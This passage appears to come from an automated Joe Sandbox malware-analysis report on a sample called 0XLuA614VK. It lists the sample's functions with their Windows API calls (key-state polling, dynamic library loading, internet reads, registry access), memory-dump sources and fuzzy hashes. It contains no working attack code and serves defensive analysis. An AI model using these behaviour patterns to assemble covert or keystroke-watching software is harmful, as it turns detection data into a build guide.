                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00FABBA6
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FABBB3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 826366716-0
                                                      • Opcode ID: 2ac0f7005fc7fdad2f75c4dd0f02459bca799c66dc0cdac47894eab769934b86
                                                      • Instruction ID: d0e9fd7fa9c5ab0c895db97988f01c9a5857f33f5dd2d699f8f58f6857ec79fb
                                                      • Opcode Fuzzy Hash: 2ac0f7005fc7fdad2f75c4dd0f02459bca799c66dc0cdac47894eab769934b86
                                                      • Instruction Fuzzy Hash: 3D61C171608241AFC314DF24C890E2ABBE5FF85358F54855CF4998B2A2CB35ED45EBA2
                                                      Function 00F88BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00F88BCD
                                                      • VariantClear.OLEAUT32 ref: 00F88C3E
                                                      • VariantClear.OLEAUT32 ref: 00F88C9D
                                                      • VariantClear.OLEAUT32(?), ref: 00F88D10
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F88D3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      • Opcode ID: 4ba36229fdd930fbb8389a582a61975f56a69febffb335945cbf266d5ff25487
                                                      • Instruction ID: 4780f69a7bd39e0621084f237d4583e9d8a42d95c228a295caac999beb53e5ee
                                                      • Opcode Fuzzy Hash: 4ba36229fdd930fbb8389a582a61975f56a69febffb335945cbf266d5ff25487
                                                      • Instruction Fuzzy Hash: 235158B5A00219EFCB14DF68C894AAAB7F8FF89350B158559E909DB354E730E912CF90
                                                      Function 00F98AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F98BAE
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F98BDA
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F98C32
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F98C57
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F98C5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: 55ff5da589cdd664130c1fd10e8d3f773c234248b8c9c1d991328c716e205c3c
                                                      • Instruction ID: 4080d310a3327bb2bc81603ad83bc332bf0ca988b70e3bf11c82ab0f2612d90e
                                                      • Opcode Fuzzy Hash: 55ff5da589cdd664130c1fd10e8d3f773c234248b8c9c1d991328c716e205c3c
                                                      • Instruction Fuzzy Hash: AC514935A002199FDF14DF64C881A6EBBF5FF49314F088058E849AB362CB35ED41EBA0
                                                      Function 00FA8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00FA8F40
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FA8FD0
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FA8FEC
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FA9032
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FA9052
                                                        • Part of subcall function 00F3F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F91043,?,7529E610), ref: 00F3F6E6
                                                        • Part of subcall function 00F3F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F7FA64,00000000,00000000,?,?,00F91043,?,7529E610,?,00F7FA64), ref: 00F3F70D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                      • String ID:
                                                      • API String ID: 666041331-0
                                                      • Opcode ID: 12d340356d65b1dbdbf8a8e598606d9fa73794e87d1cc73146446354c3fe2e99
                                                      • Instruction ID: 3165d1efeaf814a4066e0ea4b0fe2f5adc21d36f9154a4d60118977499a59138
                                                      • Opcode Fuzzy Hash: 12d340356d65b1dbdbf8a8e598606d9fa73794e87d1cc73146446354c3fe2e99
                                                      • Instruction Fuzzy Hash: C8514C75A04215DFC710DF68C4858ADBBB1FF49364F0880A9E805AB362DB75ED86EF90
                                                      Function 00FB6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FB6C33
                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00FB6C4A
                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FB6C73
                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F9AB79,00000000,00000000), ref: 00FB6C98
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FB6CC7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MessageSendShow
                                                      • String ID:
                                                      • API String ID: 3688381893-0
                                                      • Opcode ID: f3ecde8f3e4d810b172b75557ffcc41593c66f97780a421afca49265719151c8
                                                      • Instruction ID: b9bd3641d907f52b48e091929be998a64e0ce68d7fdd8f49421cf5588c4ec65f
                                                      • Opcode Fuzzy Hash: f3ecde8f3e4d810b172b75557ffcc41593c66f97780a421afca49265719151c8
                                                      • Instruction Fuzzy Hash: 5641C475A00108AFD724DF2ACC94FE67FA5EB49360F150224F995E72A0C375AD40EE90
                                                      Function 00F52051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: c13db00ffcf204bfc2093dea8704e9e7261cd32b8a2e21714c0b1b5a37c84a48
                                                      • Instruction ID: 209937588b1c3d86b29b91490467222c9bcfe4ba7f6aa77ed54db62b77b1360d
                                                      • Opcode Fuzzy Hash: c13db00ffcf204bfc2093dea8704e9e7261cd32b8a2e21714c0b1b5a37c84a48
                                                      • Instruction Fuzzy Hash: 8641E432E006049FCB20DF78C880A5EB7B5EF8A721F154669EA15EB391D731AD05EB80
                                                      Function 00F3912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00F39141
                                                      • ScreenToClient.USER32(00000000,?), ref: 00F3915E
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00F39183
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00F3919D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 7bfd200128032294fb048b2a2478732400d413e5a4e73b347034d6153946cd07
                                                      • Instruction ID: 0bb113d781772a03b78f8385993d6d80169408b3eb994be1673be910e8403eec
                                                      • Opcode Fuzzy Hash: 7bfd200128032294fb048b2a2478732400d413e5a4e73b347034d6153946cd07
                                                      • Instruction Fuzzy Hash: 2E414071A0861ABBDF15AF64C844BEEB775FB05334F208216E429A7290C7B46950EF92
                                                      Function 00F93874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetInputState.USER32 ref: 00F938CB
                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F93922
                                                      • TranslateMessage.USER32(?), ref: 00F9394B
                                                      • DispatchMessageW.USER32(?), ref: 00F93955
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F93966
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                      • String ID:
                                                      • API String ID: 2256411358-0
                                                      • Opcode ID: 43c318a48ba92a0a6fdc6061bf9c2c714656401e8cd4f4a755b3eca194b8c375
                                                      • Instruction ID: ca5552387c0347bb505ec51eec188a82088ecf7325043a85035a0a76017da037
                                                      • Opcode Fuzzy Hash: 43c318a48ba92a0a6fdc6061bf9c2c714656401e8cd4f4a755b3eca194b8c375
                                                      • Instruction Fuzzy Hash: ED31E071D0434ADEFF35CB349848BB637A9AF11310F08056DE466C21A0E3F4AA88FB61
                                                      Function 00F9CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00F9CF38
                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00F9CF6F
                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00F9C21E,00000000), ref: 00F9CFB4
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F9C21E,00000000), ref: 00F9CFC8
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F9C21E,00000000), ref: 00F9CFF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                      • String ID:
                                                      • API String ID: 3191363074-0
                                                      • Opcode ID: 520ebec9a1734860ba29adc917fe744d0ad7c0001add7a6bc2b6087f38ea9066
                                                      • Instruction ID: 74bfcbfea81f288cf39e0a409c6f9252fdaa4b00b1be61a48e9531c6b1659260
                                                      • Opcode Fuzzy Hash: 520ebec9a1734860ba29adc917fe744d0ad7c0001add7a6bc2b6087f38ea9066
                                                      • Instruction Fuzzy Hash: 69315271900205EFEF20DFA5C884AABBBF9EB14364B10442EF516D3141DB30AE45EBB0
                                                      Function 00F81901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00F81915
                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00F819C1
                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00F819C9
                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00F819DA
                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F819E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: da3909381010dd636f22598a4b5b5f72f791b3d3aa1392bb317be433511eb2a4
                                                      • Instruction ID: 47793b0aad7005253fde3b3bf184be97213f34d5084b0f487874717f4c53b2d4
                                                      • Opcode Fuzzy Hash: da3909381010dd636f22598a4b5b5f72f791b3d3aa1392bb317be433511eb2a4
                                                      • Instruction Fuzzy Hash: 7E31AF72A00219EFCB10DFA8CD99AEE3BB9FB04325F104325F965A72D1C7709955EB90
                                                      Function 00FB5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00FB5745
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00FB579D
                                                      • _wcslen.LIBCMT ref: 00FB57AF
                                                      • _wcslen.LIBCMT ref: 00FB57BA
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FB5816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen
                                                      • String ID:
                                                      • API String ID: 763830540-0
                                                      • Opcode ID: d2feed696fc851340fef42887e458af97aab511b2bd68495c03ecc6ffb70f31e
                                                      • Instruction ID: 334a57a13414ad0c3fb2b538b2de633fd85e19efcc100d96be10345aadd4d98e
                                                      • Opcode Fuzzy Hash: d2feed696fc851340fef42887e458af97aab511b2bd68495c03ecc6ffb70f31e
                                                      • Instruction Fuzzy Hash: 76217371D04618EADB20DFA1CC85BEE7BB8FF04B24F108216E919EB180D7789985EF50
                                                      Function 00FA0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00FA0951
                                                      • GetForegroundWindow.USER32 ref: 00FA0968
                                                      • GetDC.USER32(00000000), ref: 00FA09A4
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00FA09B0
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00FA09E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: e0284f69cac42d98e3f081659b999992de895e3d874e6fa18767c4b97cd2eeb8
                                                      • Instruction ID: 2629690a586370d2865f2d0ac68fbefd4794ebe5602cd863a8ad3fb22162cc79
                                                      • Opcode Fuzzy Hash: e0284f69cac42d98e3f081659b999992de895e3d874e6fa18767c4b97cd2eeb8
                                                      • Instruction Fuzzy Hash: 40218175A00214AFD714EF69DC85AAFBBE9EF49700F048168F84A97752CB34AC04EF90
                                                      Function 00F5CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00F5CDC6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5CDE9
                                                        • Part of subcall function 00F53820: RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F5CE0F
                                                      • _free.LIBCMT ref: 00F5CE22
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F5CE31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: e6cff1b95f784c6e9b2ee483024e15b3b021080cccf223605d2002ee4c2768a2
                                                      • Instruction ID: 90f29dac6f09868623ab7830d826af375b4beba5ba1b5d1148c4063843566ebf
                                                      • Opcode Fuzzy Hash: e6cff1b95f784c6e9b2ee483024e15b3b021080cccf223605d2002ee4c2768a2
                                                      • Instruction Fuzzy Hash: 02018472A013157F232116BA6C8AD7B7A6DDEC6FA23150229FE06D7201EA658D06B5F0
                                                      Function 00F39639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F39693
                                                      • SelectObject.GDI32(?,00000000), ref: 00F396A2
                                                      • BeginPath.GDI32(?), ref: 00F396B9
                                                      • SelectObject.GDI32(?,00000000), ref: 00F396E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 3c436649ac29484939f8e447c50a70727552b03f8a13227e09f8f71a763be466
                                                      • Instruction ID: 872cf64a8b14ba9f533f28092a1f14a96122c2873421641c66c6a1b4e4ba4b30
                                                      • Opcode Fuzzy Hash: 3c436649ac29484939f8e447c50a70727552b03f8a13227e09f8f71a763be466
                                                      • Instruction Fuzzy Hash: 67215931806309EBDB21AF29EC597BA3BA8BF10375F104216F810A61A0D3F09895FFD0
                                                      Function 00F85711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: b4726f63d9cedda8892e4822430b1449c39093e371a61eaaba6fa3d4f2b0eed7
                                                      • Instruction ID: 9909f2a0a758df9e015b06282dbefe2d06119b0a9c480f43c05f8b3b6b87aad5
                                                      • Opcode Fuzzy Hash: b4726f63d9cedda8892e4822430b1449c39093e371a61eaaba6fa3d4f2b0eed7
                                                      • Instruction Fuzzy Hash: B901F5A6A4160DBBE2086511DD82FFF774CAB60BA4F40C030FD049E241F724EE54B7A5
                                                      Function 00F52DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00F4F2DE,00F53863,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6), ref: 00F52DFD
                                                      • _free.LIBCMT ref: 00F52E32
                                                      • _free.LIBCMT ref: 00F52E59
                                                      • SetLastError.KERNEL32(00000000,00F21129), ref: 00F52E66
                                                      • SetLastError.KERNEL32(00000000,00F21129), ref: 00F52E6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
